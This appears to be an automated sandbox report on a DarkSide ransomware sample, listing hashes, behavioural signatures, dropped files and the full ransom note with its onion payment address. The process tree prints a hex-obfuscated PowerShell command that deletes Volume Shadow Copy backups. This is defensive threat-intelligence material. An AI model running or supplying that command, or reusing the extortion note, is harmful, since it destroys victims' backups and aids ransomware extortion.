Analysis

  • max time kernel
    131s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-05-2024 12:32

General

  • Target

    762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe

  • Size

    260KB

  • MD5

    5a1dfcf340060e11fd97775f08cc707d

  • SHA1

    ca7ba09b986c4c7c8590a2b90215785bef2efb41

  • SHA256

    762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3

  • SHA512

    9aae78da9f1c81ff671f721322031a2f12fefc3afaa90d5434a300f23775b568ed0129b629ec1910bb8345af64ff0b72f256c8f26377a5e6e527ddf5c81658b3

  • SSDEEP

    6144:+GuWNCix6AcxVBkerhbzfpZUU6wpKBWrl8mQEy:uOCix6JPzVhSwN58mty

Malware Config

Extracted

Path

C:\Users\Admin\README.47262cb1.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3 When you open our website, put the following data in the input form: Key: 5l5BZPnhuDEYAVqJR4MgValoWwML2OjDOtYwubDXeXGefcJDd4otfGdb9pJPrHW7Rt0XqdwabTWl9I5xhiHBsW6mg5BoqR4M2LZ0TI1hN4ifY7RVgRakjxxhhyImncWtgNb8LWtJlhn6cwtDLlsIjq0wAn8s7YsdzgTPPreHXEyFiFH1ozVIpZXV1mO5QXMZu16DNkFcXVIfdw5gPeSYjd3VAa7VlIH8IXgwCuza7YprCeDIOmvRqYK1jBH4s4nn0VyEHnWRndP7jNNUmat6FMhNzeKnLYGbMDRwmZR6iFdFX0Y3lhEWenDamVRchRSE5YwiL9LqTfkrnrswflssAB0SOcodZXRxG5HNItcitj3Za1NzC5fmBpdKN4jV01hMBG98ZEN8HMKeOdVxKtbAZP86K9IfBy8QcNrWLQ2hAeup6DD6KsG8R0Jj8czKTu4MDlGaxQMtPSycA0B6IzpPVV0Tbn9yWIIFH6y4mir71zDWbcPH3p5Hnr80gTnOFHXGzkGfrdy1bjn5H99zniLFFjchV8EEPMtgG2PwKF7NVQ9dTdlMBHWQpGc !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Renames multiple (150) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe
    "C:\Users\Admin\AppData\Local\Temp\762c64cef8a5e4d69b26175c202340e14a5fa8e16712bd23db45f4bc904342a3.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3600
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3572
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3592

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    556084f2c6d459c116a69d6fedcc4105

    SHA1

    633e89b9a1e77942d822d14de6708430a3944dbc

    SHA256

    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

    SHA512

    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    c321ce5c529b0b756ad69a719371d600

    SHA1

    abf615e98069e732169cb9b56d8b7b58067bd4ec

    SHA256

    9ac27c4257a90651a2ff2b6fdf448c47a1893bc5c44b6c06c3715c56ff36a0f6

    SHA512

    8a465b2ab7d61aa3ecfdb8f4fec1e4241230f1c71172c202bb5742a340195346dbe30d6e868dda3e3bb66fd658e6cfb17a44e6780ee9463d7b880f8d00ec8bf6

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o2ux0kur.d01.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\README.47262cb1.TXT

    Filesize

    1KB

    MD5

    f418a249405444da33cc73b402a26306

    SHA1

    1a6c493e74036f93f0dae4b65e6c543c213ce418

    SHA256

    b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09

    SHA512

    b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf

  • memory/3572-23-0x00007FF9F63D3000-0x00007FF9F63D5000-memory.dmp

    Filesize

    8KB

  • memory/3572-39-0x00007FF9F63D0000-0x00007FF9F6E91000-memory.dmp

    Filesize

    10.8MB

  • memory/3572-36-0x00007FF9F63D0000-0x00007FF9F6E91000-memory.dmp

    Filesize

    10.8MB

  • memory/3572-35-0x00007FF9F63D0000-0x00007FF9F6E91000-memory.dmp

    Filesize

    10.8MB

  • memory/3572-34-0x00007FF9F63D0000-0x00007FF9F6E91000-memory.dmp

    Filesize

    10.8MB

  • memory/3572-24-0x000002883E620000-0x000002883E642000-memory.dmp

    Filesize

    136KB

  • memory/3600-4-0x00000000006F0000-0x000000000072B000-memory.dmp

    Filesize

    236KB

  • memory/3600-0-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/3600-22-0x0000000000401000-0x0000000000409000-memory.dmp

    Filesize

    32KB

  • memory/3600-19-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/3600-9-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/3600-8-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/3600-2-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/3600-21-0x00000000006F0000-0x000000000072B000-memory.dmp

    Filesize

    236KB

  • memory/3600-5-0x0000000000401000-0x0000000000409000-memory.dmp

    Filesize

    32KB

  • memory/3600-6-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/3600-7-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/3600-3-0x0000000000540000-0x0000000000541000-memory.dmp

    Filesize

    4KB

  • memory/3600-1-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/3600-228-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/3600-229-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB

  • memory/3600-231-0x0000000000400000-0x000000000042E000-memory.dmp

    Filesize

    184KB